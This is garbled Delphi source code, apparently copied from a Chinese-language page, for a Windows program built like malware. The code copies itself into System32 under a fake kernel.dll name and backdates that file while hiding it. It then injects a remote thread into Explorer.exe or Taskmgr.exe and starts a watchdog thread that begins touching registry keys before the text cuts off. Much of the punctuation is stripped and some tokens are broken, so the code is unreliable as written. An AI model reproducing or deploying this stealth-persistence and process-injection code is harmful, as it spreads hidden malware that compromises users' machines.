




1、unit Unit1; interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs,PSAPI, StdCtrls,Registry; type PRemoteParameter = TRemoteParameter; TRemoteParameter = record pOutputDebugString : DWORD; pOpenprocess : DWORD; pWaitForSingleObject: DWORD; pFindFirstFile :
2、DWORD; pCopyFile : DWORD; pFindClose : DWORD; pWinExeC : DWORD; pRemotePid : DWORD; pProcessHandle : THANDLE; pFileHandle : THANDLE; pTName : array0.MAX_PATH of char; pKName : array0.MAX_PATH of char; pWinexecName : array0.MAX_PATH of char; pFData : WIN32_FIND_DATA; pOpError : array0.59 of char; pFf
3、fError : array0.59 of char; pCfError : array0.59 of char; pFcError : array0.59 of char; pWeError : array0.59 of char; pString : array0.59 of char; pWfsoSignal : array0.59 of char; end; TForm1 = class(TForm Button1: TButton; Button2: TButton; procedure Button1Click(Sender: TObject; procedure Button2C
4、lick(Sender: TObject; procedure FormCreate(Sender: TObject; private Private declarations public Public declarations end; const Name1 = 'Test.exe' const Name2 = 'kernel.dll' var Form1: TForm1; wThread : THandle; procedure Doaction; function CreateRemote(tName: PChar; kName: PChar: THa
5、ndle; function remote(pvParam:pointer:integer;stdcall; function watch(pvParam: Pointer: integer;stdcall; type EOutputDebugString = procedure(p : PChar; stdcall; EOpenProcess = function(p1: DWORD; p2: Boolean; p3: DWORD:THandle; stdcall; EWaitForSingleObject = function(p1: THandle; p2: DWORD:DWORD;st
6、dcall; EFindFirstFile = function(p1:PChar;p2: PWin32FindData:THandle;stdcall; ECopyFile = function(p1:PChar; p2: PChar; p3: Boolean:Boolean;stdcall; EFindClose = function(p:Thandle:Boolean;stdcall; EWinExec = function(p1:PChar;p2:Cardinal:Cardinal;stdcall; implementation $R *.dfm function StringToWi
7、deStringEx(const S: string; CodePage: Word: WideString; var InputLength, OutputLength: Integer; begin InputLength := Length(S; OutputLength := MultiByteToWideChar(CodePage, 0, PChar(S, InputLength, nil, 0; SetLength(Result, OutputLength; MultiByteToWideChar(CodePage, 0, PChar(S, InputLength, PWideCh
8、ar(Result, OutputLength; end; function WideStringToStringEx(const WS: WideString; CodePage: Word: string; var InputLength, OutputLength: Integer; begin InputLength := Length(WS; OutputLength := WideCharToMultiByte(CodePage, 0, PWideChar(WS, InputLength, nil, 0, nil, nil; SetLength(Result, OutputLeng
9、th; WideCharToMultiByte(CodePage, 0, PWideChar(WS, InputLength, PChar(Result , OutputLength, nil, nil; end; Function StringToUnicode(S:String:WideString; begin Result:=StringToWideStringEx(S,GetACP; end; Function UnicodeToString(S:WideString:string; begin Result:=WideStringToStringEx(S,GetACP; end;
10、procedure DoAction; var fData : WIN32_FIND_DATA; ffHandle : THandle; fcHandle : THandle; sTime : SYSTEMTIME; fTime : FILETIME; sysPath : array0.MAX_PATH-1 of char; curName : array0.MAX_PATH-1 of char; tName : array0.MAX_PATH-1 of char; kName : array0.MAX_PATH-1 of char; ret : integer; rThread : THan
11、dle; aHwnd : HWND; rt : TRect; ptNew : TPoint; title : array0.MAX_PATH-1 of char; wp : WINDOWPLACEMENT; aThreadId: Cardinal; begin / 獲取System32目錄的路徑 / tName = System32/T-Mouse.exe; kName = System32/Kernel.dll ret := GetSystemDirectory(syspath,MAX_PATH; if ret = 0 then begin OutputDebugString('Ge
12、tSystemDirectory Error'+#13#10; exit; end; strlcopy(tName,sysPath,strlen(sysPath; strCat(tName,Name1; strlCopy(kName,SysPath,strlen(SysPath; strCat(kName,Name2; ffHandle := FindFirstFile(tName,fData; / 查找Test.exe if(ffHandle=INVALID_HANDLE_VALUE then begin if GetLastError = ERROR_FILE_NOT_FOUND
13、then / 如果不存在,則復制當前文件為System32/Test.exe begin ret := GetModuleFileName(0,curName,MAX_PATH; if ret = 0 then begin OutputDebugString('GetModuleFileName Error'+#13#10; exit; end; if not CopyFIle(curName,tName,true then begin OutputDebugString('CopyFile Error'+#13#10; exit; end; end else
14、begin OutputDebugString('FindFirstFile Error'+#13#10; exit; end; end else begin if not Windows.FindClose(ffHandle then begin OutputDebugString('FindClose Error!'+#13#10; exit; end; end; ffHandle := FindFirstFile(kName,fData; / 查找Kernel.dll if ffHandle = INVALID_HANDLE_VALUE then begi
15、n if GetLastError = ERROR_FILE_NOT_FOUND then / 如果不存在,則復制當前文件為System32/Kernel.dll begin ret := GetModuleFileName(0,curName,MAX_PATH; if ret = 0 then begin OutputDebugString('GetModuleFileName Error'+#13#10; exit; end; if not CopyFile(curName,kName,true then begin OutputDebugString('CopyF
16、ile Error'+#13#10; exit; end; / 修改System32/Kernel.dll的屬性為隱藏和系統及它的時間 fcHandle := CreateFile(kName,GENERIC_WRITE,FILE_SHARE_WRITE,nil,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0; if fcHandle = INVALID_HANDLE_VALUE then begin OutputDebugString('CreateFile Error'+#13#10; exit; end; fillchar(sTime,
17、sizeof(sTime,0; stime.wYear := 2002; stime.wMonth := 1; stime.wDay := 12; stime.wDayOfWeek := 5; stime.wHour := 1; if not SystemTImeToFileTime(sTime,fTime then begin OutputDebugString('SystemTimeToFileTIme Error'+#13#10; CloseHandle(fcHandle; exit; end; if not SetFileTime(fcHandle,fTime,nil,
18、fTime then begin OutputDebugString('SetFileTime Error'+#13#10; exit; end; if not SetFileAttributes(kName,FILE_ATTRIBUTE_READONLY or FILE_ATTRIBUTE_HIDDEN or FILE_ATTRIBUTE_SYSTEM then begin OutputDebugString('SetFileAttributes Error'+#13#10; CloseHandle(fcHandle; exit; end; CloseHand
19、le(fcHandle; end else begin OutputDebugString('FindFirstFile Error'+#13#10; exit; end; end else if not Windows.FindClose(ffHandle then begin OutputDebugString('FindClose Error'+#13#10; exit; end; rThread := CreateRemote(tName,kName; / 遠程注入線程到Exporer.exe 或 mgrtask.exe if rthread = 0 t
20、hen begin OutputDebugString('CreateRemote Error'+#13#10; exit; end; / 創建一監視線程,監視遠程注入的線程有沒有在運行。 wThread := CreateThread(nil,0,watch,rThread,0,aThreadId; if wThread = 0 then begin OutputDebugString('CreateThread Error'+#13#10; CloseHandle(rThread; exit; end; end; function ProcessToPid(
21、ProcessName: string:integer; var pidProcesses : array0.1023 of DWORD; cb,cbNeeded : DWORD; cProcesses : DWORD; hProcess : THANDLE; hModule : THANDLE; i : integer; normalName : array0.1023 of char; begin cb := sizeof(pidProcesses; fillchar(normalName,sizeof(normalName,0; result := -1; if not EnumProc
22、esses(pidProcesses0,cb,cbNeeded then begin exit; end; cProcesses := cbNeeded div sizeof(DWORD; for i := 0 to cProcesses - 1 do begin hProcess := OpenProcess(PROCESS_QUERY_INFORMATION or PROCESS_VM_READ,FALSE,pidProcessesi; if hProcess <> 0 then begin if(EnumProcessModules(hProcess,hModule,size
23、of(hModule,cbNeeded then begin GetModuleBaseName(hProcess,hModule,normalName,sizeof(normalName; if compareText(ProcessName,string(normalName = 0 then begin result := pidProcessesi; closeHandle(hProcess; exit; end; end; end; end; end; function CreateRemote(tName: PChar; kName: PChar: THandle; var eTh
24、read : THandle; pHandle : THandle; aName : array0.1,0.14 of char; remoteThr : PChar; remotePar : PChar; remotePid : DWORD; cb : integer; signal : integer; hKernel32 : THandle; rp : TRemoteParameter; cbByte : DWORD; threadid : DWORD; temp : widestring; begin strcopy(aName0,'Explorer.exe' strc
25、opy(aName1,'Taskmgr.exe' signal := 1; while(true do begin signal := signal + 1; remoteP id := ProcessToPid(aName(signal mod 2; /循環獲取兩個文件的PID if remotePid = -1 then begin result := 0; exit; end else begin if remotePid = 0 then begin if (signal mod 2=0 then begin OutputDebugString('Remote
26、process Explorer isn''t running!'+#13#10; end else begin OutputDebugString('Remote process Taskmgr isn''t running!'+#13#10; end; sleep(1000; continue; end; pHandle := OpenProcess(PROCESS_CREATE_THREAD or PROCESS_VM_OPERATION or PROCESS_VM_WRITE,False,remotePid; if pHandle
27、=0 then begin sleep(1000; continue; end else begin break; end; end; end; cb := sizeof(char * 4 * 1024; / 申請4K內存 remotethr := virtualAllocEx(pHandle,nil,cb,MEM_COMMIT,PAGE_EXECUTE_READWRITE; if remotethr = nil then begin OutputDebugString('VirtualAllocEx for Thread error!'+#13#10; closehandle
28、(pHandle; exit; end; / 遠程注入列程 if not WriteProcessMemory(pHandle,remotethr,remote,cb,cbByte then begin OutputDebugString('WritePRocessMemory for thread error!'+#13#10; closehandle(pHandle; exit; end; fillchar(rp,0,sizeof(rp; rp.pRemotePid := GetCurrentProcessId; temp := StringToUnicode('i
29、 am in remote process'+#13#10; copymemory(rp.pString0, temp1,length('i am in remote process'+#13#10*2; temp := StringToUnicode('CopyFile error'+#13#10; copymemory(rp.pCfError0, temp1,length('CopyFile error'+#13#100*2; temp := StringToUnicode('FindClose error'+#13#
30、10; copymemory(rp.pFcError0, temp1,length('FindClose error'+#13#10*2; temp := StringToUnicode('FindFirstFile error'+#13#10; copymemory(rp.pFffError0, temp1,length('FindFirstFile error'+#13#10*2; temp := StringToUnicode('OpenProcess error'+#13#10; copymemory(rp.pOpErro
31、r0, temp1,length('OpenProcess error'+#13#10*2; temp := StringToUnicode('WinExec error'+#13#10; copymemory(rp.pWeError0, temp1,length('WinExec error'+#13#10*2; temp := StringToUnicode('i am out of remote process'+#13#10; copymemory(rp.pWfsoSignal0, temp1,length('i
32、am out of remote process'+#13#10*2; temp := StringToUnicode(string(tName; copymemory(rp.pTName0,temp1,length(tName*2; temp := StringToUnicode(string(kName; copymemory(rp.pKName0,temp1,length(kName*2; temp := StringToUnicode(string(tName; WideCharToMultiByte(GetACP,0,temp1,-1,rp.pWinexecName,strl
33、en(tName,nil,nil; hKernel32 := GetModuleHandle(PChar('Kernel32.dll' rp.pOutputDebugString := DWORD(GetProcAddress(hKernel32,'OutputDebugStringW' rp.pOpenprocess := DWORD(GetProcAddress(hKernel32,'OpenProcess' rp.pWaitForSingleObject := DWORD(GetProcAddress(hKernel32,'Wait
34、ForSingleObject' rp.pFindFirstFile := DWORD(GetProcAddress(hKernel32,'FindFirstFileW' rp.pCopyFile := DW ORD(GetProcAddress(hKernel32,'CopyFileW' rp.pFindClose := DWORD(GetProcAddress(hKernel32,'FindClose' rp.pWinExeC := DWORD(GetProcAddress(hKernel32,'WinExec' cb
35、 := sizeof(char * sizeof(rp; remotepar := virtualAllocEx(pHandle,nil,cb,MEM_COMMIT, PAGE_READWRITE; if remotepar = nil then begin OutputDebugString(PChar(StringToUnicode('VirtualAllocEx for parameter error'+#13#10; closehandle(pHandle; result := 0; exit; end; / 遠程注入一個結構,把一些要調用的數據傳遞過去 if not
36、WriteProcessMemory(pHandle,remotepar,rp,cb,cbByte then begin OutputDebugString(PChar(StringToUnicode('WriteProcessMemory for paramter error'+#13#10; closehandle(pHandle; result:= 0; exit; end; /啟動遠程線程 eThread := CreateRemoteThread(pHandle,nil,0,remotethr,remotepar,0,threadid; if eThread = 0
37、then begin OutputDebugString(PChar(StringToUnicode('CreateRemoteThread error'+#13#10; closehandle(pHandle; result:= 0; exit; end; result := eThread; end; function watch(pvParam: Pointer: integer;stdcall; var weThread : THandle; exitcode : DWORD; sName : array0.MAX_PATH-1 of char; wtName : array0.MAX_PATH-1 of char; wkName : array0.MAX_PATH-1 of char; lpData : array0.MAX_PATH-1 of char; rgsPath : string; aType : DWORD; dwBufLen : DWORD; ret : integer; reg : TRegistry; aKey : HKEY; begin weThread := DWORD(pvParam; rgsPath := 'softwaremicrosof